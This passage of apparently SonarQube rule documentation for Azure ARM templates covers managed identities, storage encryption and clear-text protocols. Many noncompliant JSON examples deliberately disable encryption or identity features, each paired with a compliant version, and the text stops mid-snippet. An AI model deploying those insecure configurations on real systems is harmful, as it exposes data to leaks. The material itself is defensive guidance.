          "apiVersion": "2014-04-01",
          "name": "example-firewall",
          "properties": {
            "startIpAddress": "192.168.0.0",
            "endIpAddress": "192.168.255.255"
          }
        }
      ]
    }
  ]
}
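The difference between the noncompliant and compliant firewall rules above can be checked mechanically: a start/end pair spanning the whole IPv4 space is effectively an "allow everyone" rule. A small illustrative sketch using the standard-library ipaddress module (hypothetical helper, not part of any official tooling):

```python
import ipaddress

def allows_entire_internet(start: str, end: str) -> bool:
    """True if the start..end range covers every IPv4 address."""
    lo = ipaddress.IPv4Address(start)
    hi = ipaddress.IPv4Address(end)
    return lo == ipaddress.IPv4Address("0.0.0.0") and \
           hi == ipaddress.IPv4Address("255.255.255.255")

print(allows_entire_internet("0.0.0.0", "255.255.255.255"))      # True
print(allows_entire_internet("192.168.0.0", "192.168.255.255"))  # False
```

A stricter audit could also flag very large public ranges, but the full-space rule shown in the sensitive example is the clearest signal.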

See

azureresourcemanager:S6378

Disabling Managed Identities can reduce an organization’s ability to protect itself against configuration faults and credentials leaks.

Authenticating via managed identities to an Azure resource relies solely on an API call with a non-secret token. The process is internal to Azure: the secrets Azure uses are not even accessible to end users.

In typical scenarios without managed identities, the use of credentials can lead to mistakenly leaving them in code bases. In addition, configuration faults may also happen when storing these values or assigning them permissions.

By transparently taking care of the Azure Active Directory authentication, Managed Identities allow getting rid of day-to-day credentials management.

Ask Yourself Whether

The resource:

  • Needs to authenticate to Azure resources that support Azure Active Directory (AAD).
  • Uses a different Access Control system that doesn’t guarantee the same security controls as AAD, or no Access Control system at all.

There is a risk if you answered yes to all of those questions.

Recommended Secure Coding Practices

Enable the Managed Identities capabilities of this Azure resource. If supported, use a System-Assigned managed identity, as:

  • It cannot be shared across resources.
  • Its life cycle is deeply tied to the life cycle of its Azure resource.
  • It provides a unique independent identity.

Alternatively, User-Assigned Managed Identities can also be used but don’t guarantee the properties listed above.

Sensitive Code Example

{
    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
    "contentVersion": "1.0.0.0",
    "resources": [
        {
            "type": "Microsoft.ApiManagement/service",
            "apiVersion": "2022-09-01-preview",
            "name": "apiManagementService"
        }
    ]
}

Compliant Solution

{
    "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
    "contentVersion": "1.0.0.0",
    "resources": [
        {
            "type": "Microsoft.ApiManagement/service",
            "apiVersion": "2022-09-01-preview",
            "name": "apiManagementService",
            "identity": {
                "type": "SystemAssigned"
            }
        }
    ]
}

See

azureresourcemanager:S6388

Using unencrypted cloud storage can lead to data exposure. If adversaries gain physical access to the storage medium, they can read the unencrypted information.

Ask Yourself Whether

  • The service contains sensitive information that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to encrypt cloud storage that contains sensitive information.

Sensitive Code Example

For Microsoft.AzureArcData/sqlServerInstances/databases:

Disabled encryption on SQL service instance database:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.AzureArcData/sqlServerInstances/databases",
      "apiVersion": "2023-03-15-preview",
      "properties": {
        "databaseOptions": {
          "isEncrypted": false
        }
      }
    }
  ]
}

For Microsoft.Compute/snapshots:

Disabled disk encryption with settings collection:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Compute/snapshots",
      "apiVersion": "2022-07-02",
      "properties": {
        "encryptionSettingsCollection": {
          "enabled": false
        }
      }
    }
  ]
}

For Microsoft.Compute/virtualMachines:

Disabled encryption at host level:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Compute/virtualMachines",
      "apiVersion": "2022-11-01",
      "properties": {
        "securityProfile": {
          "encryptionAtHost": false
        }
      }
    }
  ]
}

Disabled encryption for managed disk:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Compute/virtualMachines",
      "apiVersion": "2022-11-01",
      "properties": {
        "storageProfile": {
          "dataDisks": [
            {
              "id": "myDiskId"
            }
          ]
        }
      }
    }
  ]
}

Disabled encryption for OS disk:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Compute/virtualMachines",
      "apiVersion": "2022-11-01",
      "properties": {
        "storageProfile": {
          "osDisk": {
            "encryptionSettings": {
              "enabled": false
            }
          }
        }
      }
    }
  ]
}

Disabled encryption for OS managed disk:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Compute/virtualMachines",
      "apiVersion": "2022-11-01",
      "properties": {
        "storageProfile": {
          "osDisk": {
            "managedDisk": {
              "id": "myDiskId"
            }
          }
        }
      }
    }
  ]
}

For Microsoft.Compute/virtualMachineScaleSets:

Disabled encryption at host level:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Compute/virtualMachineScaleSets",
      "apiVersion": "2022-11-01",
      "properties": {
        "virtualMachineProfile": {
          "securityProfile": {
            "encryptionAtHost": false
          }
        }
      }
    }
  ]
}

Disabled encryption for data disk:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Compute/virtualMachineScaleSets",
      "apiVersion": "2022-11-01",
      "properties": {
        "virtualMachineProfile": {
          "storageProfile": {
            "dataDisks": [
              {
                "name": "myDataDisk"
              }
            ]
          }
        }
      }
    }
  ]
}

Disabled encryption for OS disk:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Compute/virtualMachineScaleSets",
      "apiVersion": "2022-11-01",
      "properties": {
        "virtualMachineProfile": {
          "storageProfile": {
            "osDisk": {
              "name": "myOsDisk"
            }
          }
        }
      }
    }
  ]
}

For Microsoft.ContainerService/managedClusters:

Disabled encryption at host level for the agent pool:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.ContainerService/managedClusters",
      "apiVersion": "2023-03-02-preview",
      "properties": {
        "agentPoolProfiles": [
          {
            "enableEncryptionAtHost": false
          }
        ]
      }
    }
  ]
}

For Microsoft.DataLakeStore/accounts:

Disabled encryption for Data Lake Store:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.DataLakeStore/accounts",
      "apiVersion": "2016-11-01",
      "properties": {
        "encryptionState": "Disabled"
      }
    }
  ]
}

For Microsoft.DBforMySQL/servers:

Disabled infrastructure double encryption for MySQL server:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.DBforMySQL/servers",
      "apiVersion": "2017-12-01",
      "properties": {
        "infrastructureEncryption": "Disabled"
      }
    }
  ]
}

For Microsoft.DBforPostgreSQL/servers:

Disabled infrastructure double encryption for PostgreSQL server:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.DBforPostgreSQL/servers",
      "apiVersion": "2017-12-01",
      "properties": {
        "infrastructureEncryption": "Disabled"
      }
    }
  ]
}

For Microsoft.DocumentDB/cassandraClusters/dataCenters:

Disabled encryption for a Cassandra Cluster datacenter’s managed disk and backup:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.DocumentDB/cassandraClusters/dataCenters",
      "apiVersion": "2023-04-15",
      "properties": {
        "diskCapacity": 4
      }
    }
  ]
}

For Microsoft.HDInsight/clusters:

Disabled encryption for data disk:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.HDInsight/clusters",
      "apiVersion": "2021-06-01",
      "properties": {
        "computeProfile": {
          "roles": [
            {
              "encryptDataDisks": false
            }
          ]
        }
      }
    }
  ]
}

Disabled encryption for data disk at application level:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.HDInsight/clusters/applications",
      "apiVersion": "2021-06-01",
      "properties": {
        "computeProfile": {
          "roles": [
            {
              "encryptDataDisks": false
            }
          ]
        }
      }
    }
  ]
}

Disabled encryption for resource disk:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.HDInsight/clusters",
      "apiVersion": "2021-06-01",
      "properties": {
        "diskEncryptionProperties": {
          "encryptionAtHost": false
        }
      }
    }
  ]
}

For Microsoft.Kusto/clusters:

Disabled encryption for disk:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Kusto/clusters",
      "apiVersion": "2022-12-29",
      "properties": {
        "enableDiskEncryption": false
      }
    }
  ]
}

For Microsoft.RecoveryServices/vaults:

Disabled encryption for disk:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.RecoveryServices/vaults",
      "apiVersion": "2023-01-01",
      "properties": {
        "encryption": {
          "infrastructureEncryption": "Disabled"
        }
      }
    }
  ]
}

Disabled infrastructure encryption for backup:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.RecoveryServices/vaults/backupEncryptionConfigs",
      "apiVersion": "2023-01-01",
      "properties": {
        "infrastructureEncryptionState": "Disabled"
      }
    }
  ]
}

For Microsoft.RedHatOpenShift/openShiftClusters:

Disabled disk encryption for master profile and worker profiles:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.RedHatOpenShift/openShiftClusters",
      "apiVersion": "2022-09-04",
      "properties": {
        "masterProfile": {
          "encryptionAtHost": "Disabled"
        },
        "workerProfiles": [
          {
            "encryptionAtHost": "Disabled"
          }
        ]
      }
    }
  ]
}

For Microsoft.SqlVirtualMachine/sqlVirtualMachines:

Disabled encryption for SQL Virtual Machine:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.SqlVirtualMachine/sqlVirtualMachines",
      "apiVersion": "2022-08-01-preview",
      "properties": {
        "autoBackupSettings": {
          "enableEncryption": false
        }
      }
    }
  ]
}

For Microsoft.Storage/storageAccounts:

Disabled enforcing of infrastructure encryption for double encryption of data:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Storage/storageAccounts",
      "apiVersion": "2022-09-01",
      "properties": {
        "encryption": {
          "requireInfrastructureEncryption": false
        }
      }
    }
  ]
}

For Microsoft.Storage/storageAccounts/encryptionScopes:

Disabled enforcing of infrastructure encryption for double encryption of data at encryption scope level:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Storage/storageAccounts/encryptionScopes",
      "apiVersion": "2022-09-01",
      "properties": {
        "requireInfrastructureEncryption": false
      }
    }
  ]
}

Compliant Solution

For Microsoft.AzureArcData/sqlServerInstances/databases:

Enabled encryption on SQL service instance database:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.AzureArcData/sqlServerInstances/databases",
      "apiVersion": "2023-03-15-preview",
      "properties": {
        "databaseOptions": {
          "isEncrypted": true
        }
      }
    }
  ]
}

For Microsoft.Compute/disks:

Enabled encryption for managed disk:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Compute/disks",
      "apiVersion": "2022-07-02",
      "properties": {
        "encryption": {
          "diskEncryptionSetId": "string",
          "type": "string"
        }
      }
    }
  ]
}

Enabled encryption through setting encryptionSettingsCollection:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Compute/disks",
      "apiVersion": "2022-07-02",
      "properties": {
        "encryptionSettingsCollection": {
          "enabled": true,
          "encryptionSettings": [
            {
              "diskEncryptionKey": {
                "secretUrl": "string",
                "sourceVault": {
                  "id": "string"
                }
              }
            }
          ]
        }
      }
    }
  ]
}

Enabled encryption through a security profile for an OS disk:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Compute/disks",
      "apiVersion": "2022-07-02",
      "properties": {
        "securityProfile": {
          "secureVMDiskEncryptionSetId": "string",
          "securityType": "{'ConfidentialVM_DiskEncryptedWithCustomerKey' | 'ConfidentialVM_DiskEncryptedWithPlatformKey' | 'ConfidentialVM_VMGuestStateOnlyEncryptedWithPlatformKey' | 'TrustedLaunch'}"
        }
      }
    }
  ]
}

For Microsoft.Compute/snapshots:

Enabled disk encryption for snapshot:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Compute/snapshots",
      "apiVersion": "2022-07-02",
      "properties": {
        "encryption": {
          "diskEncryptionSetId": "string",
          "type": "{'EncryptionAtRestWithCustomerKey' | 'EncryptionAtRestWithPlatformAndCustomerKeys' | 'EncryptionAtRestWithPlatformKey'}"
        }
      }
    }
  ]
}

Enabled disk encryption with settings collection:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Compute/snapshots",
      "apiVersion": "2022-07-02",
      "properties": {
        "encryptionSettingsCollection": {
          "enabled": true,
          "encryptionSettings": [
            {
              "diskEncryptionKey": {
                "secretUrl": "string",
                "sourceVault": {
                  "id": "string"
                }
              }
            }
          ],
          "encryptionSettingsVersion": "{'1.0' | '1.1'}"
        }
      }
    }
  ]
}

Enabled disk encryption through security profile:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Compute/snapshots",
      "apiVersion": "2022-07-02",
      "properties": {
        "securityProfile": {
          "secureVMDiskEncryptionSetId": "string",
          "securityType": "{'ConfidentialVM_DiskEncryptedWithCustomerKey' | 'ConfidentialVM_DiskEncryptedWithPlatformKey' | 'ConfidentialVM_VMGuestStateOnlyEncryptedWithPlatformKey' | 'TrustedLaunch'}"
        }
      }
    }
  ]
}

For Microsoft.Compute/virtualMachines:

Enabled encryption at host level:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Compute/virtualMachines",
      "apiVersion": "2022-11-01",
      "properties": {
        "securityProfile": {
          "encryptionAtHost": true
        }
      }
    }
  ]
}

Enabled encryption for managed disk:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Compute/virtualMachines",
      "apiVersion": "2022-11-01",
      "properties": {
        "storageProfile": {
          "dataDisks": [
            {
              "id": "myDiskId",
              "managedDisk": {
                "diskEncryptionSet": {
                  "id": "string"
                }
              }
            }
          ]
        }
      }
    }
  ]
}

Enabled encryption for managed disk through security profile:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Compute/virtualMachines",
      "apiVersion": "2022-11-01",
      "properties": {
        "storageProfile": {
          "dataDisks": [
            {
              "id": "myDiskId",
              "managedDisk": {
                "securityProfile": {
                  "diskEncryptionSet": {
                    "id": "string"
                  }
                }
              }
            }
          ]
        }
      }
    }
  ]
}

Enabled encryption for OS disk:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Compute/virtualMachines",
      "apiVersion": "2022-11-01",
      "properties": {
        "storageProfile": {
          "osDisk": {
            "encryptionSettings": {
              "enabled": true,
              "diskEncryptionKey": {
                "secretUrl": "string",
                "sourceVault": {
                  "id": "string"
                }
              }
            }
          }
        }
      }
    }
  ]
}

Enabled encryption for OS managed disk:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Compute/virtualMachines",
      "apiVersion": "2022-11-01",
      "properties": {
        "storageProfile": {
          "osDisk": {
            "managedDisk": {
              "id": "myDiskId",
              "diskEncryptionSet": {
                "id": "string"
              }
            }
          }
        }
      }
    }
  ]
}

Enabled encryption for OS managed disk through security profile:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Compute/virtualMachines",
      "apiVersion": "2022-11-01",
      "properties": {
        "storageProfile": {
          "osDisk": {
            "managedDisk": {
              "securityProfile": {
                "diskEncryptionSet": {
                  "id": "string"
                }
              }
            }
          }
        }
      }
    }
  ]
}

For Microsoft.Compute/virtualMachineScaleSets:

Enabled encryption at host level:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Compute/virtualMachines",
      "apiVersion": "2022-11-01",
      "properties": {
        "virtualMachineProfile": {
          "securityProfile": {
            "encryptionAtHost": true
          }
        }
      }
    }
  ]
}

Enabled encryption for data disk:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Compute/virtualMachineScaleSets",
      "apiVersion": "2022-11-01",
      "properties": {
        "virtualMachineProfile": {
          "storageProfile": {
            "dataDisks": [
              {
                "name": "myDataDisk",
                "managedDisk": {
                  "diskEncryptionSet": {
                    "id": "string"
                  }
                }
              }
            ]
          }
        }
      }
    }
  ]
}

Enabled encryption for data disk through security profile:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Compute/virtualMachineScaleSets",
      "apiVersion": "2022-11-01",
      "properties": {
        "virtualMachineProfile": {
          "storageProfile": {
            "dataDisks": [
              {
                "name": "myDataDisk",
                "managedDisk": {
                  "securityProfile": {
                    "diskEncryptionSet": {
                      "id": "string"
                    }
                  }
                }
              }
            ]
          }
        }
      }
    }
  ]
}

Enabled encryption for OS disk:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Compute/virtualMachineScaleSets",
      "apiVersion": "2022-11-01",
      "properties": {
        "virtualMachineProfile": {
          "storageProfile": {
            "osDisk": {
              "name": "myOsDisk",
              "managedDisk": {
                "diskEncryptionSet": {
                  "id": "string"
                }
              }
            }
          }
        }
      }
    }
  ]
}

Enabled encryption for OS disk through security profile:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Compute/virtualMachineScaleSets",
      "apiVersion": "2022-11-01",
      "properties": {
        "virtualMachineProfile": {
          "storageProfile": {
            "osDisk": {
              "name": "myOsDisk",
              "managedDisk": {
                "securityProfile": {
                  "diskEncryptionSet": {
                    "id": "string"
                  }
                }
              }
            }
          }
        }
      }
    }
  ]
}

For Microsoft.ContainerService/managedClusters:

Enabled encryption at host and set the disk encryption set ID:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.ContainerService/managedClusters",
      "apiVersion": "2023-03-02-preview",
      "properties": {
        "agentPoolProfiles": [
          {
            "enableEncryptionAtHost": true
          }
        ],
        "diskEncryptionSetID": "string"
      }
    }
  ]
}

For Microsoft.DataLakeStore/accounts:

Enabled encryption for Data Lake Store:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.DataLakeStore/accounts",
      "apiVersion": "2016-11-01",
      "properties": {
        "encryptionState": "Enabled"
      }
    }
  ]
}

For Microsoft.DBforMySQL/servers:

Enabled infrastructure double encryption for MySQL server:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.DBforMySQL/servers",
      "apiVersion": "2017-12-01",
      "properties": {
        "infrastructureEncryption": "Enabled"
      }
    }
  ]
}

For Microsoft.DBforPostgreSQL/servers:

Enabled infrastructure double encryption for PostgreSQL server:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.DBforPostgreSQL/servers",
      "apiVersion": "2017-12-01",
      "properties": {
        "infrastructureEncryption": "Enabled"
      }
    }
  ]
}

For Microsoft.DocumentDB/cassandraClusters/dataCenters:

Enabled encryption for a Cassandra Cluster datacenter’s managed disk and backup:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.DocumentDB/cassandraClusters/dataCenters",
      "apiVersion": "2023-04-15",
      "properties": {
        "diskCapacity": 4,
        "backupStorageCustomerKeyUri": "string",
        "managedDiskCustomerKeyUri": "string"
      }
    }
  ]
}

For Microsoft.HDInsight/clusters:

Enabled encryption for data disk:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.HDInsight/clusters",
      "apiVersion": "2021-06-01",
      "properties": {
        "computeProfile": {
          "roles": [
            {
              "encryptDataDisks": true
            }
          ]
        }
      }
    }
  ]
}

Enabled encryption for data disk at application level:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.HDInsight/clusters/applications",
      "apiVersion": "2021-06-01",
      "properties": {
        "computeProfile": {
          "roles": [
            {
              "encryptDataDisks": true
            }
          ]
        }
      }
    }
  ]
}

Enabled encryption for resource disk:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.HDInsight/clusters",
      "apiVersion": "2021-06-01",
      "properties": {
        "diskEncryptionProperties": {
          "encryptionAtHost": true
        }
      }
    }
  ]
}

For Microsoft.Kusto/clusters:

Enabled encryption for disk:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Kusto/clusters",
      "apiVersion": "2022-12-29",
      "properties": {
        "enableDiskEncryption": true
      }
    }
  ]
}

For Microsoft.RecoveryServices/vaults:

Enabled encryption on infrastructure:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.RecoveryServices/vaults",
      "apiVersion": "2023-01-01",
      "properties": {
        "encryption": {
          "infrastructureEncryption": "Enabled"
        }
      }
    }
  ]
}

Enabled encryption on infrastructure for backup:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.RecoveryServices/vaults/backupEncryptionConfigs",
      "apiVersion": "2023-01-01",
      "properties": {
        "encryptionAtRestType": "{'CustomerManaged' | 'MicrosoftManaged'}",
        "infrastructureEncryptionState": "Enabled"
      }
    }
  ]
}

For Microsoft.RedHatOpenShift/openShiftClusters:

Enabled disk encryption for master profile and worker profiles:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.RedHatOpenShift/openShiftClusters",
      "apiVersion": "2022-09-04",
      "properties": {
        "masterProfile": {
          "diskEncryptionSetId": "string",
          "encryptionAtHost": "Enabled"
        },
        "workerProfiles": [
          {
            "diskEncryptionSetId": "string",
            "encryptionAtHost": "Enabled"
          }
        ]
      }
    }
  ]
}

For Microsoft.SqlVirtualMachine/sqlVirtualMachines:

Enabled encryption for SQL Virtual Machine:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.SqlVirtualMachine/sqlVirtualMachines",
      "apiVersion": "2022-08-01-preview",
      "properties": {
        "autoBackupSettings": {
          "enableEncryption": true,
          "password": "string"
        }
      }
    }
  ]
}

For Microsoft.Storage/storageAccounts:

Enabled enforcing of infrastructure encryption for double encryption of data:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Storage/storageAccounts",
      "apiVersion": "2022-09-01",
      "properties": {
        "encryption": {
          "requireInfrastructureEncryption": true
        }
      }
    }
  ]
}

For Microsoft.Storage/storageAccounts/encryptionScopes:

Enabled enforcing of infrastructure encryption for double encryption of data at encryption scope level:

{
  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "resources": [
    {
      "type": "Microsoft.Storage/storageAccounts/encryptionScopes",
      "apiVersion": "2022-09-01",
      "properties": {
        "requireInfrastructureEncryption": true
      }
    }
  ]
}


azureresourcemanager:S5332

Clear-text protocols such as ftp, telnet, or http lack encryption of transported data, as well as the capability to build an authenticated connection. This means that an attacker able to sniff traffic from the network can read, modify, or corrupt the transported content. These protocols are not secure, as they expose applications to an extensive range of risks:

  • sensitive data exposure
  • traffic redirected to a malicious endpoint
  • malware-infected software update or installer
  • execution of client-side code
  • corruption of critical information

Even in the context of isolated networks like offline environments or segmented cloud environments, the insider threat exists. Thus, attacks involving communications being sniffed or tampered with can still happen.

For example, attackers could successfully compromise prior security layers by:

  • bypassing isolation mechanisms
  • compromising a component of the network
  • getting the credentials of an internal IAM account (either from a service account or an actual person)

In such cases, encrypting communications would decrease the chances that attackers successfully leak data or steal credentials from other network components. By layering various security practices (segmentation and encryption, for example), the application will follow the defense-in-depth principle.

Note that the use of the http protocol is being deprecated by major web browsers.

In the past, the use of such clear-text protocols has led to multiple publicly disclosed vulnerabilities.

Ask Yourself Whether

  • Application data needs to be protected against tampering or leaks when transiting over the network.
  • Application data transits over an untrusted network.
  • Compliance rules require the service to encrypt data in transit.
  • OS-level protections against clear-text traffic are deactivated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Make application data transit over a secure, authenticated and encrypted protocol like TLS or SSH. Here are a few alternatives to the most common clear-text protocols:
    • Use sftp, scp, or ftps instead of ftp.
    • Use https instead of http.

It is recommended to secure all transport channels, even on local networks, as it can take a single non-secure connection to compromise an entire application or system.
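To make the pattern behind the examples that follow concrete, here is a minimal sketch (a hypothetical Python helper, not SonarQube's actual analyzer) that scans a deserialized ARM template for two of the clear-text settings flagged below:

```python
def find_cleartext_issues(template: dict) -> list:
    """Return the types of resources in an ARM template that still allow clear-text traffic."""
    issues = []
    for resource in template.get("resources", []):
        rtype = resource.get("type")
        props = resource.get("properties", {})
        # Web apps should force HTTPS-only access.
        if rtype == "Microsoft.Web/sites" and props.get("httpsOnly") is False:
            issues.append(rtype)
        # Storage accounts should require HTTPS-only traffic.
        if rtype == "Microsoft.Storage/storageAccounts" and props.get("supportsHttpsTrafficOnly") is False:
            issues.append(rtype)
    return issues

template = {
    "resources": [
        {"type": "Microsoft.Web/sites", "properties": {"httpsOnly": False}},
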